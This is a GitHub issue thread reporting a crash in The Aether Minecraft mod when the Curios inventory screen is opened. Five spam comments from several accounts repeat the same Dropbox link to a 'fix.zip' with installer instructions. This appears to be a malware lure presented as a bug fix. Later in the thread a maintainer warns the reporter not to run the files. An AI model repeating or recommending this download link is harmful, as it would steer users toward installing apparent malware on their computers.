### ISSUE TITLE
Bug: game completely crashes when trying to open aether curios

### ISSUE THREAD

**Issue by crazybre02** [Gilded-Games/The-Aether#2250]
### What Feature Types Apply to This Bug?

Gui

### What Type of Bug Is This?

Crash

### Forge Version

47.3.5

### The Aether Version

1.4.2

### Is This Bug a Conflict With Another Mod?

im not suree

### Client Log

<script src="https://gist.github.com/crazybre02/c5d3ff557b611c28ac908ea1c78398cd.js"></script>

### Crash Report (if applicable)

Error: java.lang.NullPointerException: Cannot invoke "top.theillusivec4.curios.api.type.inventory.ICurioStacksHandler.getStacks()" because the return value of "java.util.Map.get(Object)" is null

### Steps to Reproduce

pressing the cloud button in the invontory immidiately crashes game

### What You Expect To Happen

the aether curios gui would appear

### What Actually Happened

crashed

### Please Read and Confirm The Following

- [X] I have confirmed this bug can be replicated without the use of Optifine.
- [X] I have confirmed this bug is on the most recently supported version of Minecraft.
- [X] I have confirmed the details provided in this report are concise as possible and does not contain vague information (ie. Versions are properly recorded, answers to questions are clear).
- [X] I have confirmed this bug is unique and has not been reported already.
- [X] If playing on a modpack, I have reported this bug to their issue tracker already.
- [X] I have confirmed that I'm reporting a bug in The Aether I, not The Aether II.

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Dev-Victor-Rodrigues** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by bconlon1** [comment]
@crazybre02 Do not run any files you have been sent, I am not sure why this ticket was raided with those by random users.

**Comment by bconlon1** [comment]
Could you provide a valid client log link?
